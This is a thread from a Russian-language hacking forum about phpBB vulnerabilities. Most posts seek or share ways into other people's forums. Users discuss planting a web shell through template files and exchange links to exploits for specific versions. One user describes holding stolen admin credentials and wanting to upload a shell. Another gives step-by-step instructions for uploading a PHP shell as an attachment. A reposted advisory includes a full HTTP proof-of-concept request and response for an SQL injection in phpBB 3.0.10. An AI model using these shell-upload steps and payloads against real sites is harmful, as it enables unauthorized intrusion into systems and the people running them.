Форумы [Обзор уязвимостей phpBB]

Discussion in 'Уязвимости CMS/форумов' started by qBiN, 8 Jan 2006.

  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    шелл в стилях, для редактирования шаба доступны только два файла
    overall_header.html и ph.html
    куда они инклудятся?
     
    _________________________
  2. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    путь чтоли, в /template.
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    нет, я не так выразился
    объясню на примере
    когда правили в стилях faq_body.html, то что мы исправили было по адресу /forum/faq.php
    а где сейчас искать мне этот php файл?
     
    _________________________
  4. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Я думаю, что overall_header.html инклудится в index.php. Попробуй.
     
    1 person likes this.
  5. SecondLife

    SecondLife Elder - Старейшина

    Joined:
    8 May 2011
    Messages:
    30
    Likes Received:
    21
    Reputations:
    21
    overall_header.html инклудится на каждой странице форума, за исключением некоторых технических. Это общая шапка.
    Файла ph.html в стандартной поставке phpBB3 нет, поэтому инклудится он может куда угодно.

    Да, если шелл в файле стиля прописан через теги <?php ?>, то ничего не выйдет, эти теги вырезаются.
     
    1 person likes this.
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    там версия 3.0.6, я скачал исходники, устроил поиск по файлам, и везде где он инклудитя — файлы html, лежащие в /templates/

    секондлайф, пхпкод прописан в
    Code:
    <!-- PHP -->
    …
    <!-- ENDPHP -->
    и выполнение его в настройках включено, все ок с этим

    ph.html по моим догадкам это page_header.html, но и его тоже нигде не нашло
     
    _________________________
  7. SecondLife

    SecondLife Elder - Старейшина

    Joined:
    8 May 2011
    Messages:
    30
    Likes Received:
    21
    Reputations:
    21
    faza02, стукни в 433230838, помогу залить.
     
  8. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    есть чо под 3,0,7?
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    justonline,
    http://www.exploit-db.com/exploits/2007/
    http://www.allinfosec.com/2010/06/09/phpbb-version-3-0-7-remote-file-include-vulnerability/

    SecondLife, отписал.
     
    _________________________
    2 people like this.
  10. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    сплоит на 2.0.17 скиньте плиз... тот что на 1 странице, линк дохлый
     
  11. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    тыц

    больше ничего не нашел.
     
    1 person likes this.
  12. tvmaudit

    tvmaudit New Member

    Joined:
    22 May 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Как решить проблему.

    Есть база данных, в ней имеется отдельная бд в этой бд phpbb. Думаю залить шелл т/к/ данные админа на руках. Проблема в том что не могу найти урл форума.

    Как узнать урл форума если ты в бд форума ?

    Пробовал вытащить название темы и поискать в гуугле, но результат не получен. Пробовал так же искать из phpbb_sitelist там записей 0.
     
  13. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Phpbb 3.0 memberlist.php SQL injection

    to ex'pert
    Попробуйте данный сплойт
    Phpbb 3.0 memberlist.php SQL injection
     
    #73 cat1vo, 4 Jul 2012
    Last edited: 4 Jul 2012
  14. ex'pert

    ex'pert New Member

    Joined:
    28 May 2011
    Messages:
    19
    Likes Received:
    3
    Reputations:
    -3
    cat1vo, спасибо! Однако порылся в других файлах сайта и оказалось что там версия 3.0.10 на самом деле((. Админ изначально пытался скрыть, но я нашел истинную версию форума. На ней старый експлоит не работает. Теперь подскажите пожалуйста на новую) :)
     
    #74 ex'pert, 4 Jul 2012
    Last edited: 6 Jul 2012
  15. ex'pert

    ex'pert New Member

    Joined:
    28 May 2011
    Messages:
    19
    Likes Received:
    3
    Reputations:
    -3
    есть что то новое под 3.0.10 ?
     
  16. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Name : phpBB3 SQL Injection
    ------------------------------------------------------------------
    Date : 27.07.2012
    ------------------------------------------------------------------
    Site : www.phpbb.com
    ------------------------------------------------------------------
    Version : 3.0.10
    ------------------------------------------------------------------

    1) What is it?
    This is very nice forum board. You should try it!
    ------------------------------------------------------------------
    2) Type of bug?
    SQL Injection (or SQL-info-Leak if You want).
    ------------------------------------------------------------------
    3) Where is the bug?
    Vulnerable parameter seems to be 'style' because if we set up this parameter
    to 'bigger number' (for example: 111111111) we will get an error, with full SQL
    statement.

    *updated - dateformat is the second vulnerable parameter!
    *updated - post_st is the 3rd vulnerable parameter!
    *updated - another one: topic_st


    4) PoC traffic from Burp:
    4.1) Request :

    ---
    POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&amp;mode=personal HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip, deflate
    Proxy-Connection: keep-alive
    Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
    Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 258
    Connection: close

    viewemail=1
    &amp;massemail=1
    &amp;allowpm=1
    &amp;hideonline=0
    &amp;notifypm=1
    &amp;popuppm=0
    &amp;lang=en
    &amp;style=%2b1111111111
    &amp;tz=0
    &amp;dst=0
    &amp;dateoptions=D+M+d%2C+Y+g%3Ai+a
    &amp;dateformat=D+M+d%2C+Y+g%3Ai+a
    &amp;submit=Submit
    &amp;creation_time=1343370877
    &amp;form_token=576...

    ---

    4.2) Response:

    ---
    HTTP/1.1 503 Service Unavailable
    Date: Fri, 27 Jul 2012 06:39:06 GMT
    Server: Apache/2.2.22 (Ubuntu)
    X-Powered-By: PHP/5.3.10-1ubuntu3.2
    Vary: Accept-Encoding
    Connection: close
    Content-Type: text/html
    Content-Length: 2889


    <!DOCTYPE html PUBLIC "(...)

    <a href="./">Return to the index page</a> </div> <div id="acp"> <div class="panel">
    <div id="content">
    <h1>General Error</h1>
    <div>SQL ERROR [ mysqli ]<br /><br />Out of range value for column 'user_style' at row 1 [1264]<br />
    <br />SQL<br /><br />UPDATE phpbb_users
    SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,
    user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,
    user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111
    WHERE user_id = 2<br />
    <br />BACKTRACE<br /><div style="font-family: monospace;"><br />
    <b>FILE:</b> [ROOT]/includes/db/mysqli.php<br />
    <b>LINE:</b> 182<br />
    <b>CALL:</b> dbal->sql_error()<br /><br />
    <b>FILE:</b> [ROOT]/includes/ucp/ucp_prefs.php
    <br /><b>LINE:</b> 100<br />
    <b>CALL:</b> dbal_mysqli->sql_query()<br /><br />
    <b>FILE:</b> [ROOT]/includes/functions_module.php<br />
    <b>LINE:</b> 507<br />
    <b>CALL:</b> ucp_prefs->main()<br />
    <br /><b>FILE:</b> [ROOT]/ucp.php<br />
    <b>LINE:</b> 333<br />
    <b>CALL:</b> p_master->load_active()<br />
    </div><br /></div>
    <p>Please notify the board administrator or webmaster: (...)

    ---


    4.2 Other response (this time from post_st parameter):
    ---
    </style></head><body id="errorpage"><div id="wrap">
    <div id="page-header">
    <a href="./">Return to the index page</a>
    </div> <div id="acp"> <div class="panel">
    <div id="content">
    <h1>General Error</h1>
    <div>SQL ERROR [ mysqli ]<br /><br />
    Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]
    <br /><br />An SQL error occurred while fetching this page.
    Please contact the <a href="(...)
    ---

    5) More?

    - Ethical hacking for Your company:
    http://hauntit.blogspot.com

    - Burp Proxy:
    http://www.portswigger.org

    - phBB3 Download:
    http://www.phpbb.com
     
  17. MrCepbIu

    MrCepbIu Banned

    Joined:
    24 Feb 2010
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    не подкинете ни чего на 3.0.2?
     
  18. ~nero~

    ~nero~ Member

    Joined:
    3 Jul 2012
    Messages:
    15
    Likes Received:
    8
    Reputations:
    3
    Заливка шелла

    phpBB2 Plus by phpMiX
    Идем в админпанель+ расширения + управление + добавляем расширение php (группа archives)
    Идем на форум.
    Создаем тему + прикрепить файл + прикрепляем шел.
    После нажатия кнопки "Прикрепить файл" в разделе "Прикрепленные файлы" появится наш шелл. Просто нажимаем на него и он открывается в новой вкладке.
     
  19. DasTem

    DasTem New Member

    Joined:
    6 Oct 2012
    Messages:
    36
    Likes Received:
    1
    Reputations:
    0
    для 3.0.8 есть что-то?
     
  20. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    как можно залить шелл,если через шаблоны не получается,выходит sql ошибка